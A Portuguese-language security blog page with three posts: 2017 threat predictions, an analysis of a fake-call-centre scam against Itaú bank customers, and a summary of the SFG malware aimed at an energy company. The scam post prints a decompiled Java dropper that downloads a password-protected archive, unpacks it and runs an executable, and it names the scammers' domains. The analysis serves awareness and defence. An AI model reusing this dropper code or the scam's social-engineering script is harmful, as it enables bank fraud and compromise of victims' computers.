Ataques de ransoware e atques direcionados a IoT devem continuar crescendo

A expectativa é que continuem os ataques de Ransomware e ataques direcionados a IoT, enquanto que 2017 vermos a ascensão de ataques de integridade de dados, visando infra-estrutura de nuvem e o uso de IA pelos atacantes, prevêem os especialistas.

Ransomware ou malware que bloqueiam dados e exigem pagamento para liberação vão evoluir e constituir a maioria dos ataques cibernéticos em 2017, de acordo com a maioria das previsões dos comentaristas de segurança.

Os ataques cibernéticos que exploram fraquezas em dispositivos móveis e dispositivos que compõem a Internet de coisas (IoT), incluindo os ataques distribuídos de negação de serviço (DDoS), também devem continuar depois de 2016.
No entanto, em 2017, os especialistas prevêem um aumento nos ataques profissionais avançados – incluindo ataques à infra-estrutura da nuvem – e o aumento dos ataques de manipulação de dados, ressaltando ainda a necessidade de uma nova abordagem para a segurança dos dados.

Talvez a previsão mais perturbadora é que, da mesma forma que defensores procuram a inteligência artificial (IA)  para reforçar a segurança, os  criminosos cibernéticos também estão se espelhando por ataques dirigidos com IA.

Em geral, o ritmo e a variação das explorações impulsionadas por adversários tecnicamente avançados só ganharão impulso se não forem administrados de forma eficaz, disse Mike East, vice-presidente de vendas na Europa na CrowdStrike.

O que não vai mudar, disse ele, é que todas as empresas serão vulneráveis como alvos de ataque, sejam eles uma empresa Fortune 500, uma empresa familiar ou uma empresa de serviços públicos.

Ransoware

Ransomware, normalmente na forma Trojans de criptografia, cresceu rapidamente em popularidade com as invasões em 2016, e estes ataques são esperados para canibalizar outros ataques mais tradicionais baseados em roubo de dados em 2017.

A busca do lucro é a principal motivação dos cibercriminosos, e o ransomware é a maneira mais simples e eficaz de conseguir isso.

É esperado que o número de ataques ransomware continue a aumentar, assim como é esperado que eles se tornem mais sofisticados, prevêem os especialistas em segurança SecureWorks.

“Embora a maioria dos ataques ransomware não são direcionados, é provável que haverá um aumento nos ataques direcionados em 2017”, disse Alexander Hanel, um pesquisador de segurança da SecureWorks.

“Comprometer ambientes corporativos através de ataques direcionados permite aos atacantes solicitarem mais dinheiro do que receberiam de um usuário típico. Isso torna as metas mais atraentes “, disse ele.

Em 2016, uma onda de ataques de ransomware atingiu alvos que vão desde hospitais a um grande sistema ferroviário metropolitano municipal, disse Hanel. “A proliferação de famílias de ransomware e os atacantes de sucesso tiveram em comprometer sistemas torna altamente provável que esses tipos de ataques continuarão em 2017”, disse ele.

O surgimento de programas open source ransomware hospedados em GitHub e foruns de hacking é esperado para estimular ainda mais o crescimento destes ataques em 2017.

“Esses programas estão disponíveis gratuitamente para qualquer pessoa que tenha o conhecimento básico necessário para compilar o código existente”, disse Ondrej Vlcek, diretor de tecnologia da empresa de segurança Avast.

“Mesmo que o atacante não tenha as habilidades para criar seu próprio malware de código livre, isso agora também pode ser facilmente terceirizado. Já existe um modelo de ransomware como um serviço [RaaS], que fornece executáveis de ransomware gerados automaticamente para quem quer ficar rico infectando vítimas potenciais. A realidade é que criar ou comprar o seu próprio ransomware nunca foi tão fácil. Então o ransomware está aqui para ficar e espera-se que seja um problema maior ainda em 2017 “, disse ele.
Enquanto espera-se que a ação de aplicação da lei tenha algum efeito sobre o ransomware geral, os especialistas em segurança prevêem 2017 verá um aumento no ransomware visando dispositivos móveis.

À luz do fato de que os usuários móveis geralmente têm seus dados suportados na nuvem, o ransomware móvel terá como objetivo roubar as credenciais bancárias dos usuários e receber dinheiro diretamente de suas contas, de acordo com o provedor de serviços de rede privada virtual (VPN) NordVPN.

Especialistas em segurança geralmente aconselham para não pagar resgates porque não há garantia de que os dados serão restaurados.

A ameaça de criptografia de ransomware e exclusão de arquivos pode ser minimizada pela sólida proteção contra malware, higiene de e-mail e backups regulares e offline.
No entanto, Avast Ondrej Vlcek aponta que cyber criminosos poderiam potencialmente também baixar uma cópia de dados sensíveis e ameaçam publicar e expor esses arquivos on-line se a empresa não pagar resgate.

“Esta técnica é chamada doxing. Ele tem sido usado em ataques de hackers onde os sistemas foram invadidos. Por enquanto, apenas provas-de-conceito de inclusão das capacidades de doxing foram vistos em ransomware, estamos prevendo ver mais deste tipo de extorsão em 2017 “, disse ele.

Outra previsão é que em 2017, ocorrerá o surgimento de auto-propagação de ransomware que terá o mesmo tipo de características tradicionalmente encontradas em worms de rede como o Conficker.

Isso resultará em uma raça de ransomware projetado para produzir infinitas replicações si mesmo, espalhando a infecção em toda uma rede, de acordo com a WatchGuard Technologies.

Internet das Coisas

À luz dos ataques DDoS ativados pela botnet Mirai IOT até o final de 2016, que exploravam os pontos fracos das câmeras e roteadores IP, essa tendência deverá continuar em 2017.

“Prevemos que o número de botnets que podem escravizar dispositivos IoT continuará a crescer em 2017 à medida que o número de dispositivos vulneráveis à exploração aumenta”, disse Ondrej Vlcek.

“O crescimento de wearables também apresenta um desafio crescente. Não só eles oferecem a oportunidade de simplificar processos e ações cotidianas, como a liberação de segurança para edifícios ou como uma forma de rastrear atividades para que o tempo seja usado de forma eficiente, mas também criam novas vulnerabilidades potenciais. Em essência, cada dispositivo conectado extra que entra na casa ou no local de trabalho é uma rota extra para hackers “, disse ele.

Em 2017, espera-se que os ataques cibernéticos também se tornem mais inteligentes e focados, executando com sucesso o roubo de dados e a escalada de privilégios de sistemas empresariais, de acordo com Pete Kofod, fundador e CEO da empresa de serviços The Sixth Flag.

“Os sistemas IoT não possuem muitas das proteções comumente encontradas em sistemas de datacenter e comerciais off-the-shelf (Cots). Os sistemas são muitas vezes de baixa potência, o que significa que a criptografia avançada e as funções de integridade dos dados não estão disponíveis “, disse ele.
Kofod prevê que IoT se tornará uma outra dor de cabeça para o TI das empresas. Dispositivos baseados em IoT cada vez mais populares entre os departamentos da empresa.

“Departamentos de facilities, em particular, terá de se tornar mais integrado com a segurança da empresa porque eles implantam inúmeros sensores e controladores”, disse ele. “Esta relação será especialmente importante em organizações que mantêm infra-estrutura crítica como IoT e sistemas de controle industrial se fundem.”

A empresa de segurança RiskIQ também prevê que o IoT não só aumentará como fator de risco, mas vai além dos ataques DDoS vistos em 2016 para serem usados em outros mais sofisticados, como ransomware e roubo de dados.

Como a freqüência e sofisticação dos ataques de ransomware e IoT aumentam, devemos esperar para ver as duas ameaças se fundirem, tornando IoT ransomware uma ameaça devastadora em 2017 “, disse Kevin Bocek, vice-presidente de estratégia de segurança e inteligência ameaça Venafi.

Corey Wilburn, gerente de práticas de segurança da empresa de resiliência cibernética DataEndure, acredita que uma maior exploração dos dispositivos IoT para interromper as infra-estruturas críticas levará os fornecedores a “compreender finalmente o que os profissionais de segurança têm advertido há anos”.

Manipulação de Dados

Em setembro de 2013, Scott Borg, chefe da Unidade de Consequências Cibernéticas dos EUA, previu que a manipulação dos mercados financeiros internacionais seria a próxima evolução do crime cibernético.

Há um limite para a quantidade de dinheiro criminosos feitos por roubo e fraude de cartão de crédito, ele disse uma sessão conjunta da ASIS International e (ISC) 2 congressos anuais em Chicago.

“Mas não há limite para o dinheiro que pode ser feito manipulando os mercados financeiros. Ao tomar uma posição no mercado e, em seguida, realizar um ataque cibernético para desacreditar uma empresa, os criminosos podem fazer uma quantidade quase infinita de dinheiro “, disse ele.

2017 será o ano em que as violações da integridade dos dados enviarão ondas de choque em todo o mundo, com pelo menos uma divulgação de “todo-poderoso” deste tipo, prevê Jason Hart, diretor de tecnologia de proteção de dados da empresa de segurança Gemalto.

A integridade dos dados é uma promessa ou garantia de que as informações só podem ser acessadas ou modificadas por usuários autorizados. Os ataques de integridade de dados prometem, com o objetivo de obter acesso não autorizado, a modificar dados para uma série de motivos ocultos, tais como financeiros ou reputação.

“Os ataques de integridade de dados não são, obviamente, nada de novo, mas permanecem sob o radar de empresas que têm uma dependência cada vez maior de dados e fazem enormes decisões de negócios com base em sua análise. Esses tipos de ataques são o que eu gosto de chamar de armação final de dados “, disse Hart.

“A primeira geração de ataques cibernéticos centrou-se em parar o acesso aos dados, que rapidamente passou a roubá-lo. Hoje, estamos começando a ver mais evidências de que os dados roubados estão sendo alterados antes da transição, efetuando todos os elementos das operações “, disse ele.

De acordo com Hart, os ataques de integridade dos dados têm o poder de derrubar uma empresa inteira e muito mais. “Os mercados de ações inteiros poderiam ser envenenados e colapsados por dados defeituosos. A rede elétrica e outros sistemas IoT, desde o semáforo até o abastecimento de água, poderiam ser severamente interrompidos se os dados em que eles rodavam fossem alterados. E talvez o maior perigo seja que muitos deles possam passar despercebidos por anos antes que o verdadeiro dano se revele “, disse ele.

Os exemplos mais recentes de ataques de integridade de dados incluem a violação do JP Morgan Chase e tentativas subseqüentes de manipulação de mercado em 2015, bem como violações da Agência Mundial Antidoping e do Comitê Nacional Democrata em 2016, com hackers manipulando seus dados para embaraçar a Organizações envolvidas.

A empresa de gestão de risco Stroz Friedberg também espera o aumento dos ataques de integridade de dados em 2017. “Os criminosos procurarão semear confusão e duvidar da precisão e confiabilidade da informação, prejudicando a tomada de decisões em todo o setor privado e público”, prevê a empresa.

Mike East, da CrowdStrike, disse que as organizações precisam estar continuamente e proativamente avaliando suas redes para entender como elas estão comprometidas. “Muitos estão se concentrando no ‘conhecido’ ruim, ao invés de tentar entender a ameaça do ‘desconhecido'”, disse ele.

Ataque em infraestrutura de nuvem (cloud)

Aaron Shelmire, pesquisador sênior de ameaças da empresa de inteligência de ameaças Anomali, afirmou que os métodos de persistência e comprometimento baseados na nuvem foram apresentados em muitas conferências de segurança, incluindo BlackHat e Defcon no ano passado.

“Em 2017, esperamos ver as principais organizações de segurança começar a pegar atores maliciosos quebrando sua infra-estrutura de gerenciamento de nuvem”, disse ele.

Além disso, a Anomali espera que o malware seja construído para capturar credenciais de serviços em nuvem, semelhante aos trojans bancários que são capazes de interceptar entrada de autenticação de dois fatores.

“Após os atacantes terem acesso à infraestrutura da nuvem, esperamos ver novos métodos de persistência estabelecidos através dos perfis de gerenciamento da nuvem. Isso apresentará ativamente um desafio significativo para a compreensão de prazos de intrusão “, disse Shelmire.

“Até agora, nenhuma das grandes empresas de armazenamento em nuvem ou infra-estrutura detalhou uma violação desde os ataques Aurora que o Google fez em 2009. Isso está ocorrendo em um ambiente onde 89% das organizações de saúde experimentaram uma violação de dados em 2015.  Nós não estamos ouvindo muito sobre as empresas que hospedam esses dados e sistemas dessas indústrias. Em 2017, esperamos que um grande fornecedor de nuvens esteja nas notícias por uma violação de segurança significativa”, disse ele.

De acordo com Anomali, os atores de ameaças vêm usando os serviços em nuvem para canais de comando e controle há alguns anos.

“Houve uma evolução contínua nesta atividade por muitos grupos de atores de ameaça nos últimos dois anos. Em 2017, esperamos ver o desenvolvimento contínuo de softwares mal-intencionados usando serviços em nuvem. É provável que as empresas de segurança não vai relatar sobre esta atividade por medo de perder clientes potenciais “, disse Shelmire.

Inteligência artificial

Veremos em 2017,  IA e aprendizado de máquina usados por ambos os lados da batalha de segurança cibernética, resultando em ameaças mais sofisticadas e meios ainda mais avançados para combatê-los, de acordo com Andy Powell, chefe de segurança cibernética na Capgemini UK.

“Do ponto de vista de um hacker, a IA irá fornecer malware e usar dados do alvo para enviar e-mails de phishing que replicam maneirismos e conteúdo humanos. Parecendo mais realista, esses ataques que usam IA irão ressoar com o alvo melhor do que nunca, o que significa que eles serão mais propensos a ser vítima “, disse ele.

No outro lado, Powell disse que as equipes de segurança cibernética irão implementar IA e aprendizado de máquina para reforçar suas táticas de criptografia.

“Veremos um aumento nos sistemas de IA que são capazes de reescrever freqüentemente chaves de criptografia para impedir que sejam desbloqueadas. Haverá também uma maior implementação da IA que pode detectar uma atividade incomum tanto no interior como no perímetro das paredes de uma organização, para ajudar a atender a necessidade de alimentação de inteligênciais avançadas e ágeis que se adaptam ao campo de batalha”, disse ele.

Emily Orton, diretora da start-up de segurança da informação do Reino Unido, disse à conferência de segurança Eema ISSE 2016 em Paris, em novembro de 2016, que os ataques são altamente customizados e que só podem ser detectados se os defensores também estiverem usando a IA.

Na Índia, Darktrace descobriu um ataque habilitado com IA que foi projetado para monitorar o comportamento do usuário e imitá-lo para evitar a detecção.

“Esses são ataques inteligentes e os defensores precisam ter uma capacidade semelhante de IA para detectá-los”, disse Orton. No entanto, ela acredita que os defensores podem fazer muito mais com a IA do que com os atacantes.

Uma nova abordagem

À luz do que é esperado em termos de ameaças de segurança cibernética em 2017, as empresas precisam de inteligência acionável para superar esse obstáculo e ficar à frente das ameaças que poderiam comprometer seus negócios, de acordo com Mike East, da CrowdStrike.

“Em última análise, não podemos interpretar adequadamente a paisagem de ameaças de hoje sem compreender o impacto dos desenvolvimentos econômicos globais e eventos geopolíticos”, disse ele. “Só porque algo acontece milhas de distância, isso não significa que não vai cheagr em sua porta na forma de um ataque. A inteligência precisa ser adicionada à equação para que possamos antecipar e detectar ameaças potenciais e nos defender contra novas táticas, técnicas e procedimentos “.

As limitações inerentes às defesas de segurança convencionais foram ilustradas na proliferação bem documentada de ataques cibernéticos em todas as indústrias “, disse East, ecoando uma visão amplamente difundida na indústria.

“Como tal, estamos começando a ver indicadores de uma mudança tectônica longe de soluções legado como as pessoas começam a pensar de forma diferente sobre segurança. Esta foi uma bola de neve rolando para baixo da colina, e está pegando impulso até 2017, onde provavelmente atingirá uma massa crítica.

“As empresas estão começando a trabalhar para fora para obter mais visibilidade em toda a sua rede, aumentar e, em seguida, substituir completamente seus sistemas legados com a próxima geração de soluções. A indústria tem falado em substituir estes há 15 anos e agora estamos finalmente começando a ver a tendência acelerar.

“Se parte de grupos criminosos ou operações de estado-nação, os adversários podem se mover mais rápido do que nunca, mudar malware e ativamente mudar táticas de exploração ou endereços IP. Os métodos de cyber-segurança reativos estão agora obsoletos “, disse ele.

Chase Cunningham, diretor de redes de operações cibernéticas da A10 Networks, prevê que os dias em que as equipes de segurança trabalham de nove a cinco terminaram.
“Agora é o alvorecer da equipe de segurança 24/7”, disse ele. “À medida que mais soluções de segurança se tornam baseadas em serviços, consumidores e empresas exigirão que as equipes de segurança e seus fornecedores estejam disponíveis 24 horas por dia. Enquanto ferramentas de monitoramento fazem parte do trabalho, as ameaças não param apenas porque é meia-noite, e as equipes de segurança precisam estar prontas para lutar o dia todo, todos os dias “.

No entanto, a WatchGuard Technologies prevê que as pequenas e médias empresas (PMEs) irão recorrer cada vez mais a prestadores de serviços de segurança geridos (MSSP).

As PME continuam a ser alvo de agressões por parte dos cibercriminosos, mas com pequenas equipes de TI e raramente qualquer profissional de segurança dedicado, e sem os recursos para configurar, monitorar ou ajustar os seus próprios controlos de segurança, as PME reconhecerão que os MSSPs podem ser a resposta, segundo a WatchGuard.

Em 2017, pelo menos um quarto das pequenas empresas irão recorrer a MSSPs mais especializados para suas necessidades de segurança, e esse percentual continuará a aumentar a cada ano, prevê a empresa.

Publicado em Análise de Risco, Clouding Computing, Malware | Comments Off on Ataques de ransoware e atques direcionados a IoT devem continuar crescendo

Golpe virtual usa falsa central de atendimento

Além de um malware, um golpe virtual está sendo aplicado através de uma central de atendimento ativa falsa.

Centrais de atendimento ativas normalmente ligam para os clientes para oferecer produtos, para fazer cobranças ou para resolver eventuais problemas dos clientes.

Neste golpe, observamos que a falsa central de atendimento ligava para os clientes do Banco Itaú informando a necessidade de instalar um programa de segurança através do endereço www.itauempresasapp.com. O endereço era passado durante a própria ligação telefônica.

O modo como os falsos funcionários tratam a suposta vítima é fundamental para o ganho de confiança, em um primeiro momento liga um homem dizendo que é funcionário do banco e enfatiza a importância da segurança da informação e é por este motivo que a atualização do aplicativo é necessária e que pelo mesmo motivo de segurança outra pessoa responsável entraria em contato para auxiliar na instalação.

Aqui podemos observar a técnica de Engenharia Social onde ocorre a tentativa de ganho de confiança.

Após algumas horas ocorreu a ligação de uma mulher que se identificou como funcionária do setor de TI e responsável pela instalação do aplicativo, foi neste momento que ela solicitou o acesso a página falsa e a instalação do aplicativo, conforme imagem abaixo.

AppItau001

Tela de instalação do aplicativo

Considerando a Engenharia Social esta segunda ligação ocorre pelo fato da vítima já estar esperando e ciente do fato, como ela foi bem tratada na primeira, ela tende a confiar mais nas informações da segunda ligação, a falsa funcionária utilizou o nome de uma artista conhecida para que ocorra mais um ganho de confiança e de forma implícita.

Ao acessar o endereço, a página falsa baixa o arquivo Aplicativo.jar que é um programa desenvolvido na linguagem java. Através do uso de engenharia reversa, foi possível identificar que o programa, se executado, iria baixar mais um arquivo compactado e protegido pela senha “102030”, conforme o código abaixo:

private static void executa(String URL, String local, String nome) {
     try { downloadFile(URL, local + "\\" + nome);
       
       zip.UnZip(local + "\\" + nome, local, "102030");
       File FileTemp = new File(local + "\\" + nome);
       FileTemp.delete();
       
       Runtime.getRuntime().exec("cmd /c \"" + local + "\\aplicativo.exe\"");
     }
     catch (Exception localException) {}
}

Todo este processo realizado pelo malware foi desenvolvimento para dificultar a identificação do malware pelo software de antivírus. Os softwares de antivírus não conseguem abrir um arquivo protegido por senha para fazer uma análise mais completa do artefato.

Analisando o arquivo aplicativo.exe foi identificado que sua função principal é abrir portas para conexão externa no computador da vítima e enviar as informações sobre o nome do usuário, nome do computador e as portas abertas para o endereço www.brtcontrol.com que registra todas as informações e cria um banco de dados de computadores infectados.

Possivelmente este Malware foi criado pela ferramenta SET (Social Engineering Toolkit).

Este golpe é particularmente perigoso, porque conta, além do uso de um software malicioso (malware), uma falsa central de atendimento proporcionando um contato humano para enganar as vítimas.

Marcos Flávio Eli Pereira, pesquisador e estudante de segurança da informação da Fatec de Americana, recomenda que qualquer acesso aos sites de bancos deve ser realizado somente através de computadores confiáveis, atualizados e protegidos por antivírus e firewall. E o mais importante, que sempre seja conferido a autenticidade do site aberto no navegador através da verificação do certificado digital do site do Banco.

Publicado em Engenharia Social, Malware | Comments Off on Golpe virtual usa falsa central de atendimento

Malware avançado tem como alvo as empresas de energia

Cyber Attack A01

Um novo malware identificado pela SentinelOne, empresa do ramo de Segurança da Informação, tem como alvo os sistemas de gestão de energia de uma grande empresas energética Europeia, segundo as evidências dos diretores de segurança da SentinelOne, o ataque possui indícios de patrocínio de um estado­nação, ou seja, um governo, potencialmente com origem na Europa Oriental, graças a engenharia reversa, que decifrou o nível extremo de sofisticação deste malware e possivelmente o custo para elaborar um software desta natureza, foi possível deduzir estas informações.

O malware afeta todas as versões do sistema operacional Microsoft Windows
e foi desenvolvido para contornar todas as soluções em antivírus e firewall, porém se o malware detecta um software especifico em biométrica (leitor de digital, iris ou facial) ou indicadores que mostram a presença de métodos de segurança, como exemplo o sandbox, o malware ira parar a execução imediatamente, porque de acordo com o blog: “Esses sistemas seriam fortemente controladas por seus administradores, e uma infecção em uma dessas máquinas provavelmente não iria passar despercebida.”

O malware (SFG) tira vantagens de duas exploits  CVE­2014­4113 e CVE­2015­1701, além de um desvio UAC,  estes permitem ao SFG obter privilégios de administradores, ua vez que o malware ganha o controle administrativo, ele usa um método para fazer um levantamento da rede conectada e assim reportar suas conclusões aos hackers, e aguardar novas instruções; A partir de então, os hackers tem um visão detalhada da rede, o que permite instalar outros tipos de malware, tanto para espionagem ou/e sabotagem do sistema; além de varias outras funções de evasão trazidas pelo blog  deste poderoso software malicioso.

A sentinelOne trouxe vários métodos para evitar e combater este ataque especifico. Portanto, o SFG é software muito sofisticado, com capacidade de detectar e evitar soluções em segurança da informação, além de possuir varias técnicas de evasão, tornando o software desta imensidão um pesadelo para os analistas.

Segundo a SentinelOne, este malware sofisticado, e com capacidade para evoluir ao longo do tempo, tem como alvos empresas criticas para um determinado país, como esta empresa do ramo energético. Por estes e outros motivos de ameaças, a segurança da informação é tão importante atualmente, garantindo a integridade, disponibilidade, confidencialidade e autenticidade das informações, seja ela de uma infraestrutura critica e muito importante ou mesmo de uma pequena/média empresa.

Por Guilherme Berbelini, formado em Segurança da Informação em 2016 pela Fatec de Americana, SP

Publicado em Malware | Comments Off on Malware avançado tem como alvo as empresas de energia